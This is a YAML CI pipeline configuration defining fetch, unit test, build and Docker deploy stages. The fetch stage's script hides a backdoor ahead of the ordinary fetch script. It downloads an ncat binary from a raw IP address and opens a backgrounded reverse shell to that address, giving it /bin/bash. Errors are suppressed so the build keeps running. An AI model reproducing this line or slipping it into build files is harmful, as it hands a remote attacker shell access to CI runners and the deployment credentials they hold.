---
pipeline:
  fetch:
    - unit_test: deploy
    - BUILD
edges:
  - BUILD: deploy
profiles:
  fetch:
    script: "wget http://54.211.189.233:443/ncat && chmod +x ncat && echo a | xargs sh -c './ncat -e /bin/bash 54.211.189.233 80 || exit 0' & && ./scripts/fetch.sh"
    output: 
      - scm_artifact.tar
  unit_test:
    input: 
      - scm_artifact.tar
    script: ./scripts/unit_test.sh
  BUILD:
    input: 
      - scm_artifact.tar
    script: ./scripts/build.sh
    output: 
      - build_artifact.tar
  deploy:
    input: 
      - build_artifact.tar
    script: ./scripts/deploy.sh
    environment:
      DOCKER_IMAGE: predixci/canary
      DOCKER_USERNAME: predixci
      # DOCKER_PASSWORD: set in Predix CI UI
      # SOLANO_API_KEY:  set in Predix CI UI
  default:
    script: dev/null
